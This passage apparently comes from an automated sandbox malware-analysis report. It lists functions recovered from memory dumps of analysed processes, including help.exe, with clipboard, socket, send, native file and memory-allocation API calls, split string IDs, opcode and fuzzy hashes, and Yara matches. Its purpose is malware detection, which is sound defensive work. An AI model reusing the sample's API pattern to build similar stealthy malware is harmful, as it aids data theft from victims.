                                                                                                                                                    • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                    • Instruction Fuzzy Hash: D5627F30618F088BC7A9EB68D8947EAB7E1FF94300F50592ED59BC7642EF30A545CB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B3EB2, Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2793039342-0
                                                                                                                                                    • Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                                                                                                    • Instruction ID: fa363653e5ad12f7cecea9885ae8e0a198e16d27832ea4e262e2ebfa823fdf0b
                                                                                                                                                    • Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                                                                                                    • Instruction Fuzzy Hash: F2113030A10D298FEBD5AB28888D3F661E0FF48306F5864B8950DCA5D1DF75C58ACB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: closesocket
                                                                                                                                                    • String ID: clos$esoc$ket
                                                                                                                                                    • API String ID: 2781271927-3604069445
                                                                                                                                                    • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                    • Instruction ID: 11a11e172c238da4030fd0e64e41eb6aea405ae5797334b28ed81cb0be39f56f
                                                                                                                                                    • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                    • Instruction Fuzzy Hash: 0CF0907061CB089FCBC0DF1894897E9B7E0FB8A314F54156DE48DCA645CB7885468783
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: closesocket
                                                                                                                                                    • String ID: clos$esoc$ket
                                                                                                                                                    • API String ID: 2781271927-3604069445
                                                                                                                                                    • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                    • Instruction ID: 14518f2ffc096a114b0d4e47bb8e3ab5b56e298787efcfa57a881a0487749138
                                                                                                                                                    • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                    • Instruction Fuzzy Hash: 10F01770618B089FCBC4EF18D4C97A9BBE0FB89314F64556DA44ECA245CB7889468B82
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: connect
                                                                                                                                                    • String ID: conn$ect
                                                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                                                    • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                    • Instruction ID: 87c9918681eedd3ccb0f6acb4e96e6673c331cc9659e8deeaf3d690ca0845741
                                                                                                                                                    • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                    • Instruction Fuzzy Hash: 9E011E70618A088FDB84EF5CE488B55BBE0EB59314F1545AEA90DCB267CA74C8858BC5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: connect
                                                                                                                                                    • String ID: conn$ect
                                                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                                                    • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                    • Instruction ID: 60a703f1c2d9c7783b573e250964c44afeecccb02efdceddbc891212d27fbb7e
                                                                                                                                                    • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                    • Instruction Fuzzy Hash: 77012C70618A088FDBC4EF5CE488B55BBE0EB58314F1541AEA90DCB267CA70C8818BC1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: send
                                                                                                                                                    • String ID: send
                                                                                                                                                    • API String ID: 2809346765-2809346765
                                                                                                                                                    • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                    • Instruction ID: e8609d95fe365b6dd1196bf8818d48b7847840211102ad7af25086812e2e7af9
                                                                                                                                                    • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                    • Instruction Fuzzy Hash: 0B012130918A088FCBC4EF5CE489B5577E0EB98324F1545AE994DCB266CB70D881CBC2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: send
                                                                                                                                                    • String ID: send
                                                                                                                                                    • API String ID: 2809346765-2809346765
                                                                                                                                                    • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                    • Instruction ID: 2575748f7d09150e33be8947cbd4593e09369becd00b6b8745922c7dec52b92a
                                                                                                                                                    • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                    • Instruction Fuzzy Hash: 49010C30618A088FDBC8EF1CE489B55BBE0EB5C324F1545AE994DCB266CB70D881CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B6D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: socket
                                                                                                                                                    • String ID: sock
                                                                                                                                                    • API String ID: 98920635-2415254727
                                                                                                                                                    • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                    • Instruction ID: 06dc33b44840d22f25515e8bee4bb276bec3dc0f48fe4a47a44a96884df207ec
                                                                                                                                                    • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                    • Instruction Fuzzy Hash: A5012C70658A188FDB84EF1CE048B54BBE0FB99314F1541AEE94DCB266C770C9458B85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B2272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                    • Instruction ID: 0db2e8804edbb54616c7c75f703325236021db793c18a47ea78ed5d3a63dc9cd
                                                                                                                                                    • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                    • Instruction Fuzzy Hash: 9B214F30A14B4D8FDBD4EF5884982FAB3A1FB98300F48176E9A1DCB506CB709545CBD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 063B3EAA, Relevance: 1.6, APIs: 1, Instructions: 64clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000013.00000002.503012197.00000000062C0000.00000040.00000001.sdmp, Offset: 062C0000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2793039342-0
                                                                                                                                                    • Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                                                                                                    • Instruction ID: 14a2d4ca826ec33abc6e24e96c2c3100ec860417c8c757f47cf88029ad092228
                                                                                                                                                    • Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                                                                                                    • Instruction Fuzzy Hash: C0111F30A10D198FEB95AB28888D7EA61E0FF48306F5964B8950DCA5D2DB75C58ACB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Analysis Process: help.exe PID: 5276 Parent PID: 3388 help.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 005481D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00543BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00543BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0054821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction ID: ace4d2680e1a141d6dc81880708517b58dfd7c4f88ec913f269e6588a7285836
                                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction Fuzzy Hash: FCF0B2B2201208ABCB08DF88DC85EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005481CC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00543BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00543BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0054821D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 721229d67e75fd589d78cdbf7def279786ae68d74ad32933a8b59bbe059313f7
                                                                                                                                                    • Instruction ID: 5892c5731420e4b56e2671b23fe75175a12bc0e23b5447ed48c5433e8745a59f
                                                                                                                                                    • Opcode Fuzzy Hash: 721229d67e75fd589d78cdbf7def279786ae68d74ad32933a8b59bbe059313f7
                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0B2B2201208ABCB08DF88DC85EEB77A9AF8C754F158248BA0D97241D630EC518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00548280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:T,FFFFFFFF,?,b=T,?,00000000), ref: 005482C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:T
                                                                                                                                                    • API String ID: 2738559852-2405547601
                                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction ID: 50b0105b57d1f1701fa36f3f42553466af4c2639ffdf066fa781494d97e2f8e2
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction Fuzzy Hash: D2F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00548300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(@=T,?,?,00543D40,00000000,FFFFFFFF), ref: 00548325
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID: @=T
                                                                                                                                                    • API String ID: 3535843008-2301987201
                                                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                    • Instruction ID: 7967dca52392bfab2dbc92a61c338ffe3a74c0f34ef9d20a9c5db73d0b6b2c6e
                                                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                    • Instruction Fuzzy Hash: 0AD012756002146BD710EF98DC45EE77B9CEF84750F154455BA185B242C570F90086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005483AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00532D11,00002000,00003000,00000004), ref: 005483E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: febb7a2e65963082f83098f9fa9379880bc018faedb125f06af0697ba0c53646
                                                                                                                                                    • Instruction ID: 7a3c6b75bc59ff8b883e6e473932840eb39b4a69ce06ed73489d923148ce6bdc
                                                                                                                                                    • Opcode Fuzzy Hash: febb7a2e65963082f83098f9fa9379880bc018faedb125f06af0697ba0c53646
                                                                                                                                                    • Instruction Fuzzy Hash: 75F08CB120004AABCB04DFA8DD84CEB7BA9FF88314B158749F94CA7206C634E8158BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005483B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00532D11,00002000,00003000,00000004), ref: 005483E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                    • Instruction ID: e2292aeae2d7e8093556da12a088d6121be5525ca88c057754750b7b71d8c349
                                                                                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                    • Instruction Fuzzy Hash: 41F015B2200208ABCB14DF89DC81EEB77ADAF88754F118148BE0897241C630F810CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 096bfa43114bf17e27a3f2c4dba6ac7b1fdef4ff8a3e0c048669f9e0fb8e2456
                                                                                                                                                    • Instruction ID: 967c4e089f6c2acc881f56bf6b91f5a68732506d39f8e4c979bf4d113677992b
                                                                                                                                                    • Opcode Fuzzy Hash: 096bfa43114bf17e27a3f2c4dba6ac7b1fdef4ff8a3e0c048669f9e0fb8e2456
                                                                                                                                                    • Instruction Fuzzy Hash: 2C90026121186443D200A5695D14B57040597D4343F51C529A0145554CCB5588716561
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 802bcfa785ec8b145fb56f5318293d3f5a6d94f8aaf6dbc2d44419cd0a21fcf4
                                                                                                                                                    • Instruction ID: 71c1bf3bf219cab9db485927334f982c1197d56ab18e94a7dd2b06e66503acb5
                                                                                                                                                    • Opcode Fuzzy Hash: 802bcfa785ec8b145fb56f5318293d3f5a6d94f8aaf6dbc2d44419cd0a21fcf4
                                                                                                                                                    • Instruction Fuzzy Hash: 979002B120106803D140B1595504796040597D4341F51C425A5055554E87998DE576A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7edcbd3d4f1934356c96dfde2dd2967fcaa213e8e4d93844fbdbad345f4b2e81
                                                                                                                                                    • Instruction ID: 6b2ada4732c10b5bad20261bfd629e526812dd03c6dd3ccd3bc1cc07f6e5894f
                                                                                                                                                    • Opcode Fuzzy Hash: 7edcbd3d4f1934356c96dfde2dd2967fcaa213e8e4d93844fbdbad345f4b2e81
                                                                                                                                                    • Instruction Fuzzy Hash: 4D9002A134106843D100A1595514B560405D7E5341F51C429E1055554D8759CC627166
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: d2f2005514728e8498b498b6da62afe8ec8fa61caa613c1ae8272b27353aab32
                                                                                                                                                    • Instruction ID: 645a886f5622975402601533b625f08a748e11609629168fecd18457002a4b9a
                                                                                                                                                    • Opcode Fuzzy Hash: d2f2005514728e8498b498b6da62afe8ec8fa61caa613c1ae8272b27353aab32
                                                                                                                                                    • Instruction Fuzzy Hash: A39002612420A5535545F15955046574406A7E4281791C426A1405950C87669866E661
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: ca55ded77577416a601b76b8b41c0b225425138103a90c72a1f74ee358130018
                                                                                                                                                    • Instruction ID: 8ff892b63a2edf92a382490a3eed7d19c66869e5214eab4ea53da3e9d8772dd1
                                                                                                                                                    • Opcode Fuzzy Hash: ca55ded77577416a601b76b8b41c0b225425138103a90c72a1f74ee358130018
                                                                                                                                                    • Instruction Fuzzy Hash: 9190027120106813D111A1595604757040997D4281F91C826A0415558D97968962B161
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 0aeb328b7e719fd5c3bda4e902731be2ecfc10d913f664d1e873f8e5b6092c03
                                                                                                                                                    • Instruction ID: 870831bedf7a94ed0656dfcf77acea649e02c4d61e5461c6e69455075d7082da
                                                                                                                                                    • Opcode Fuzzy Hash: 0aeb328b7e719fd5c3bda4e902731be2ecfc10d913f664d1e873f8e5b6092c03
                                                                                                                                                    • Instruction Fuzzy Hash: B290027120106803D100A5996508796040597E4341F51D425A5015555EC7A588A17171
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 98a4ca93111798c1adcd885908d9c69de848aa8928245e33070c9c77b8f3b721
                                                                                                                                                    • Instruction ID: 834ad7eef3b53bf640fec930167bd3721943834ae5f853bc71dce81886b4a81b
                                                                                                                                                    • Opcode Fuzzy Hash: 98a4ca93111798c1adcd885908d9c69de848aa8928245e33070c9c77b8f3b721
                                                                                                                                                    • Instruction Fuzzy Hash: 1490026921306403D180B159650875A040597D5242F91D829A0006558CCB5588796361
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03109FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 18a1f5e7b16570c2505c94e4720c5708e3c2e865e1daa00fcd8749c6a33e06cc
                                                                                                                                                    • Instruction ID: 8393f3b76b3c88704f01b8eafa38b24df932926f92d00de1b3830f398a4e8f9f
